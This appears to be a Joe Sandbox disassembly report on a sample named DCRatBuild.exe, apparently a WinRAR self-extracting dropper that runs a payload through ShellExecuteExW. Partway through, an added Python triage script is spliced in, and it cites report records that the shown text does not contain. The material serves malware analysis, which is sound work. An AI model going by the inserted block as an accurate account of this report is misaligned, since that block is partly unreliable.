                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                      • API String ID: 4184910265-980926923
                      • Opcode ID: c88022baf3ff28cdbcd6dfa4bae1649a7a08ebc459e022467c8f86a612aa9e79
                      • Instruction ID: c8987b523e37a1ebfdb5b91b8e2a57bd35fff0eb79e5042dd048b9cba4aff1e6
                      • Opcode Fuzzy Hash: c88022baf3ff28cdbcd6dfa4bae1649a7a08ebc459e022467c8f86a612aa9e79
                      • Instruction Fuzzy Hash: 7112A271E002199FDF24EFA4EC81BEEB7B6EF04704F14456AE546A7291EB709A44CB70

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00D7AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                        • Part of subcall function 00D7AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                        • Part of subcall function 00D7AC74: IsDialogMessageW.USER32(000103F6,?), ref: 00D7ACAA
                        • Part of subcall function 00D7AC74: TranslateMessage.USER32(?), ref: 00D7ACB8
                        • Part of subcall function 00D7AC74: DispatchMessageW.USER32(?), ref: 00D7ACC2
                      • GetDlgItem.USER32(00000068,00DBECB0), ref: 00D7CB6E
                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00D7A632,00000001,?,?,00D7AECB,00D94F88,00DBECB0), ref: 00D7CB96
                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D7CBA1
                      • SendMessageW.USER32(00000000,000000C2,00000000,00D935B4), ref: 00D7CBAF
                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D7CBC5
                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D7CBDF
                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D7CC23
                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D7CC31
                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D7CC40
                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D7CC67
                      • SendMessageW.USER32(00000000,000000C2,00000000,00D9431C), ref: 00D7CC76
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                      • String ID: \
                      • API String ID: 3569833718-2967466578
                      • Opcode ID: 23dbde3b440688cc713525f56f0fcf9a32981865d3ac0438f3c077c76f4034ff
                      • Instruction ID: 1fef7ec4b9dfd8f607a8d9572e6a2a52af32468bf3dd1ec46a3f92a2a4d13273
                      • Opcode Fuzzy Hash: 23dbde3b440688cc713525f56f0fcf9a32981865d3ac0438f3c077c76f4034ff
                      • Instruction Fuzzy Hash: FB31D171185343AFE301DF20DC8AFAB7FACEB86744F000519FA51D6291EB644908EBB6

                      Control-flow Graph

                      control_flow_graph 795 d7ce22-d7ce3a call d7e360 798 d7ce40-d7ce4c call d835b3 795->798 799 d7d08b-d7d093 795->799 798->799 802 d7ce52-d7ce7a call d7f350 798->802 805 d7ce84-d7ce91 802->805 806 d7ce7c 802->806 807 d7ce95-d7ce9e 805->807 808 d7ce93 805->808 806->805 809 d7ced6 807->809 810 d7cea0-d7cea2 807->810 808->807 811 d7ceda-d7cedd 809->811 812 d7ceaa-d7cead 810->812 813 d7cee4-d7cee6 811->813 814 d7cedf-d7cee2 811->814 815 d7ceb3-d7cebb 812->815 816 d7d03c-d7d041 812->816 821 d7cef9-d7cf0e call d6b493 813->821 822 d7cee8-d7ceef 813->822 814->813 814->821 817 d7d055-d7d05d 815->817 818 d7cec1-d7cec7 815->818 819 d7d036-d7d03a 816->819 820 d7d043 816->820 825 d7d065-d7d06d 817->825 826 d7d05f-d7d061 817->826 818->817 823 d7cecd-d7ced4 818->823 819->816 824 d7d048-d7d04c 819->824 820->824 830 d7cf27-d7cf32 call d6a180 821->830 831 d7cf10-d7cf1d call d717ac 821->831 822->821 827 d7cef1 822->827 823->809 823->812 824->817 825->811 826->825 827->821 836 d7cf34-d7cf4b call d6b239 830->836 837 d7cf4f-d7cf5c ShellExecuteExW 830->837 831->830 838 d7cf1f 831->838 836->837 840 d7cf62-d7cf6f 837->840 841 d7d08a 837->841 838->830 843 d7cf82-d7cf84 840->843 844 d7cf71-d7cf78 840->844 841->799 846 d7cf86-d7cf8f 843->846 847 d7cf9b-d7cfba call d7d2e6 843->847 844->843 845 d7cf7a-d7cf80 844->845 845->843 848 d7cff1-d7cffd CloseHandle 845->848 846->847 857 d7cf91-d7cf99 ShowWindow 846->857 847->848 862 d7cfbc-d7cfc4 847->862 850 d7cfff-d7d00c call d717ac 848->850 851 d7d00e-d7d01c 848->851 850->851 863 d7d072 850->863 855 d7d01e-d7d020 851->855 856 d7d079-d7d07b 851->856 855->856 861 d7d022-d7d028 855->861 856->841 860 d7d07d-d7d07f 856->860 857->847 860->841 864 d7d081-d7d084 ShowWindow 860->864 861->856 865 d7d02a-d7d034 861->865 862->848 866 d7cfc6-d7cfd7 GetExitCodeProcess 862->866 863->856 864->841 865->856 866->848 867 d7cfd9-d7cfe3 866->867 868 d7cfe5 867->868 869 d7cfea 867->869 868->869 869->848
                      APIs
                      • ShellExecuteExW.SHELL32(?), ref: 00D7CF54
                      • ShowWindow.USER32(?,00000000), ref: 00D7CF93
                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00D7CFCF
                      • CloseHandle.KERNEL32(?), ref: 00D7CFF5
                      • ShowWindow.USER32(?,00000001), ref: 00D7D084
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                      • String ID: $.exe$.inf
                      • API String ID: 3686203788-2452507128
                      • Opcode ID: 4c6c61f791929807e1170daa68b5196682400ec959ac2709040a19bf0e8ef35a
                      • Instruction ID: d72e5775f36f80f8e8232802998d86b231efa947896cb1e0aef1ebd638ced57e
                      • Opcode Fuzzy Hash: 4c6c61f791929807e1170daa68b5196682400ec959ac2709040a19bf0e8ef35a
                      • Instruction Fuzzy Hash: 9D61CF70414381DEDB319F249800AABBBF6EF85304F08A91EF5C997255F7B18989CB72
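The `APIs` and `String ID` fields of the records above are enough to tag behaviour mechanically: the function at 00D700E4 resolves `SetDllDirectoryW`/`SetDefaultDllDirectories` through `GetProcAddress` and probes for `DXGIDebug.dll`, `dwmapi.dll` and `uxtheme.dll` beside the executable; the dialog function at 00D7AEE5 carries the `__tmp_rar_sfx_access_check_%u` and `winrarsfxmappingfile.tmp` strings of a WinRAR SFX stub; the function at 00D7CF54 launches the extracted payload through `ShellExecuteExW`. The script below is an added example, not part of the report or of Joe Sandbox. It parses exactly those line shapes, splits the String ID field on `$` (an assumption: a literal `$` inside a string cannot be told apart from the separator), and derives tags from API names, arguments and strings; the embedded sample is copied from those three records.

```python
"""Tag behaviour from the per-function 'APIs' / 'String ID' records of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox. It assumes only the line shapes
visible on this page ('• Name.MODULE(args), ref: ADDR', optionally prefixed with
'Part of subcall function ADDR:', and '• String ID: a$b$c') and splits the String ID
field on '$' (assumption: a literal '$' inside a string cannot be told apart from it).
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*)$")


@dataclass
class ApiCall:
    name: str
    args: list[str]
    ref: str
    subcall_of: Optional[str] = None          # set when the call happens inside a callee


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)

    def calls(self, name: str) -> list[ApiCall]:
        return [c for c in self.apis if c.name == name]


def parse_report(text: str) -> list[FunctionRecord]:
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        if line.strip() == "Control-flow Graph":   # heading that opens each record
            if cur.apis or cur.strings:
                records.append(cur)
            cur = FunctionRecord()
        elif (m := API_LINE.match(line)):
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            cur.apis.append(ApiCall(m.group("name"), args, m.group("ref").upper(), m.group("sub")))
        elif (m := STRING_LINE.match(line)):
            cur.strings.extend(s for s in m.group("strings").split("$") if s)
    if cur.apis or cur.strings:
        records.append(cur)
    return records


def classify(rec: FunctionRecord) -> set[str]:
    """Heuristic tags derived only from API names, arguments and strings of one record."""
    tags = set()
    resolved = {a for c in rec.calls("GetProcAddress") for a in c.args}
    if resolved & {"SetDllDirectoryW", "SetDefaultDllDirectories"}:
        tags.add("dll-search-hardening")       # search-path APIs resolved at run time
    dlls = [s for s in rec.strings if s.lower().endswith(".dll")]
    if dlls and (rec.calls("GetFileAttributesW") or rec.calls("CompareStringW")):
        tags.add("sideload-guard")             # probes for named DLLs next to the binary
    if rec.calls("ShellExecuteExW") or rec.calls("CreateProcessW"):
        tags.add("spawns-process")
    if any("sfx" in s.lower() for s in rec.strings):
        tags.add("winrar-sfx-stub")            # e.g. '__tmp_rar_sfx_access_check_%u'
    return tags


def summarize(text: str) -> list[tuple[str, list[str]]]:
    out = []
    for rec in parse_report(text):
        first = next((c.ref for c in rec.apis if c.subcall_of is None), "")
        out.append((first, sorted(classify(rec))))
    return out


# Excerpt copied from three of the function records above (report text, not constructed).
SAMPLE_REPORT = """\
Control-flow Graph
APIs
• GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D704E7
  • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
Control-flow Graph
APIs
• __EH_prolog.LIBCMT ref: 00D7AEE5
  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
• String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\\Users\\user\\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
Control-flow Graph
APIs
• ShellExecuteExW.SHELL32(?), ref: 00D7CF54
• String ID: $.exe$.inf
"""

if __name__ == "__main__":
    print(*summarize(SAMPLE_REPORT), sep="\n")
```

The tags are triage hints, not verdicts. `sideload-guard` is inferred from the combination this SFX stub shows (a `.dll` name in the string set plus `GetFileAttributesW`/`CompareStringW`); the same APIs in a different function could just as well be a loader looking for a DLL to load, so confirm against the function's control-flow graph and the `ExitProcess`/`LoadLibraryW` outcome before relying on the label.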

                      Control-flow Graph

                      control_flow_graph 870 d8a058-d8a071 871 d8a073-d8a083 call d8e6ed 870->871 872 d8a087-d8a08c 870->872 871->872 882 d8a085 871->882 874 d8a099-d8a0bd MultiByteToWideChar 872->874 875 d8a08e-d8a096 872->875 877 d8a250-d8a263 call d7ec4a 874->877 878 d8a0c3-d8a0cf 874->878 875->874 879 d8a0d1-d8a0e2 878->879 880 d8a123 878->880 883 d8a101-d8a112 call d88518 879->883 884 d8a0e4-d8a0f3 call d91a30 879->884 886 d8a125-d8a127 880->886 882->872 890 d8a245 883->890 896 d8a118 883->896 884->890 895 d8a0f9-d8a0ff 884->895 889 d8a12d-d8a140 MultiByteToWideChar 886->889 886->890 889->890 893 d8a146-d8a158 call d8a72c 889->893 894 d8a247-d8a24e call d8a2c0 890->894 901 d8a15d-d8a161 893->901 894->877 900 d8a11e-d8a121 895->900 896->900 900->886 901->890 902 d8a167-d8a16e 901->902 903 d8a1a8-d8a1b4 902->903 904 d8a170-d8a175 902->904 906 d8a200 903->906 907 d8a1b6-d8a1c7 903->907 904->894 905 d8a17b-d8a17d 904->905 905->890 908 d8a183-d8a19d call d8a72c 905->908 909 d8a202-d8a204 906->909 910 d8a1c9-d8a1d8 call d91a30 907->910 911 d8a1e2-d8a1f3 call d88518 907->911 908->894 923 d8a1a3 908->923 913 d8a23e-d8a244 call d8a2c0 909->913 914 d8a206-d8a21f call d8a72c 909->914 910->913 926 d8a1da-d8a1e0 910->926 911->913 922 d8a1f5 911->922 913->890 914->913 928 d8a221-d8a228 914->928 927 d8a1fb-d8a1fe 922->927 923->890 926->927 927->909 929 d8a22a-d8a22b 928->929 930 d8a264-d8a26a 928->930 931 d8a22c-d8a23c WideCharToMultiByte 929->931 930->931 931->913 932 d8a26c-d8a273 call d8a2c0 931->932 932->894
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D84E35,00D84E35,?,?,?,00D8A2A9,00000001,00000001,3FE85006), ref: 00D8A0B2
                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D8A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00D8A138
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D8A232
                      • __freea.LIBCMT ref: 00D8A23F
                        • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      • __freea.LIBCMT ref: 00D8A248
                      • __freea.LIBCMT ref: 00D8A26D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: 28d6b5fd73ac8426761f25cbb000f5c9aaa9c3083a195c6c62bb00f4043eba3e
                      • Instruction ID: a8663e88b0079f40a373188902437d37d2464dd320d4279437ae141679cb3752
                      • Opcode Fuzzy Hash: 28d6b5fd73ac8426761f25cbb000f5c9aaa9c3083a195c6c62bb00f4043eba3e
                      • Instruction Fuzzy Hash: A551DE72600216AFFB35AE68CC41FBB77A9EB41760F19422AFC04D6140EB35DC4087B6

                      Control-flow Graph

                      control_flow_graph 935 d699b0-d699d1 call d7e360 938 d699d3-d699d6 935->938 939 d699dc 935->939 938->939 940 d699d8-d699da 938->940 941 d699de-d699fb 939->941 940->941 942 d69a03-d69a0d 941->942 943 d699fd 941->943 944 d69a12-d69a31 call d670bf 942->944 945 d69a0f 942->945 943->942 948 d69a33 944->948 949 d69a39-d69a57 CreateFileW 944->949 945->944 948->949 950 d69abb-d69ac0 949->950 951 d69a59-d69a7b GetLastError call d6b66c 949->951 953 d69ac2-d69ac5 950->953 954 d69ae1-d69af5 950->954 959 d69a7d-d69a9f CreateFileW GetLastError 951->959 960 d69aaa-d69aaf 951->960 953->954 956 d69ac7-d69adb SetFileTime 953->956 957 d69af7-d69b0f call d6fe56 954->957 958 d69b13-d69b1e 954->958 956->954 957->958 962 d69aa5-d69aa8 959->962 963 d69aa1 959->963 960->950 964 d69ab1 960->964 962->950 962->960 963->962 964->950
                      APIs
                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00D678AD,?,00000005,?,00000011), ref: 00D69A4C
                      • GetLastError.KERNEL32(?,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69A59
                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00D678AD,?,00000005,?), ref: 00D69A8E
                      • GetLastError.KERNEL32(?,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69A96
                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69ADB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$CreateErrorLast$Time
                      • String ID:
                      • API String ID: 1999340476-0
                      • Opcode ID: 140011471d6d4a92dcabe58b5259a879bfbb98bd4ca31fbfc3d3b55eb1dc86ec
                      • Instruction ID: df45e0bcd9f7e63d8a1ad8fda4406a9905c334c66de7dbba18f551ffdc7cd03e
                      • Opcode Fuzzy Hash: 140011471d6d4a92dcabe58b5259a879bfbb98bd4ca31fbfc3d3b55eb1dc86ec
                      • Instruction Fuzzy Hash: D54122705447466FE7208F60CC45BDAFBD8AB05324F14071AF9E8962D1E7B5A988CBB1

                      Control-flow Graph
                      • Graph figure not reproduced: basic blocks d7ac74-d7accc; calls PeekMessageW, GetMessageW, IsDialogMessageW, TranslateMessage, DispatchMessageW
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                      • IsDialogMessageW.USER32(000103F6,?), ref: 00D7ACAA
                      • TranslateMessage.USER32(?), ref: 00D7ACB8
                      • DispatchMessageW.USER32(?), ref: 00D7ACC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Message$DialogDispatchPeekTranslate
                      • String ID:
                      • API String ID: 1266772231-0
                      • Opcode ID: 7dcb53d5de2b028c2ffd02b3ac6fc86e3fea2b1dd26c90df73b06d788333bd8e
                      • Instruction ID: 84aad7bb71731be651974bad1cd7dc3e2882380b60158fe5ea5572e3d443fbe6
                      • Opcode Fuzzy Hash: 7dcb53d5de2b028c2ffd02b3ac6fc86e3fea2b1dd26c90df73b06d788333bd8e
                      • Instruction Fuzzy Hash: F7F0BD7190132BAB8B209BE59C4CDEF7F6CEE453917448416F919D2210EA34D505D7B1

                      Control-flow Graph
                      • Graph figure not reproduced: basic blocks d876bd-d877e0; calls d8b290, GetModuleFileNameA, d8895a, d88839, d877e1, d87956, d8ada3, d884de
                      APIs
                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\DCRatBuild.exe,00000104), ref: 00D876FD
                      • _free.LIBCMT ref: 00D877C8
                      • _free.LIBCMT ref: 00D877D2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Users\user\Desktop\DCRatBuild.exe
                      • API String ID: 2506810119-2157893583
                      • Opcode ID: ad9a597adefb17207d660d9e279b2aa506d01fd93f952c1c20eb47f4bafbe7d9
                      • Instruction ID: b5ab592ec0b6392d82eee76fb0dbab2e31cd05afb875d2a813e966dedcb4f84e
                      • Opcode Fuzzy Hash: ad9a597adefb17207d660d9e279b2aa506d01fd93f952c1c20eb47f4bafbe7d9
                      • Instruction Fuzzy Hash: 63315C75A04219AFDB21FB999D81DAEBBECEB85710F284066E80497211D6708E40DBB0

                      Control-flow Graph
                      • Graph figure not reproduced: basic blocks d7a2c7-d7a31f; calls GetClassNameW, d717ac, SHAutoComplete, FindWindowExW
                      APIs
                      • GetClassNameW.USER32(?,?,00000050), ref: 00D7A2DE
                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D7A315
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D7A305
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                      • String ID: EDIT
                      • API String ID: 4243998846-3080729518
                      • Opcode ID: e61a940575b1765c20d71d8f2e1e31c95d31df49c0ecd9321fd1167fc05cfdaf
                      • Instruction ID: 450c76c7b65f508e573e35fa707cee0da39d2cdaec8d93de3d55241c4f87a899
                      • Opcode Fuzzy Hash: e61a940575b1765c20d71d8f2e1e31c95d31df49c0ecd9321fd1167fc05cfdaf
                      • Instruction Fuzzy Hash: ADF08232A0132977E7205A689C05FEF776C9B86B50F484156BD49E2280E7609946C6F6

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                        • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                      • OleInitialize.OLE32(00000000), ref: 00D7A34E
                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D7A385
                      • SHGetMalloc.SHELL32(00DA8430), ref: 00D7A38F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                      • String ID: riched20.dll
                      • API String ID: 3498096277-3360196438
                      • Opcode ID: f4d63a59d54eac95918c38e36d8225a8a6f8eeec3b4880c760fc4aa2b2026390
                      • Instruction ID: 0167060ecd46d655e43e76fd934871d0ad838b29c15c505dff419613055ce05e
                      • Opcode Fuzzy Hash: f4d63a59d54eac95918c38e36d8225a8a6f8eeec3b4880c760fc4aa2b2026390
                      • Instruction Fuzzy Hash: 7EF0E7B1D0020AABCB10AF99D8499EFFBFCEB95711F00415AE814E2241DBB456098BB1

                      Control-flow Graph
                      • Graph figure not reproduced: basic blocks d7d287-d7d2e3; calls d7e360, SetEnvironmentVariableW, d6fbd8, d6fcf1
                      APIs
                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D7D29D
                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D7D2D9
                      Strings
                      Memory Dump Source
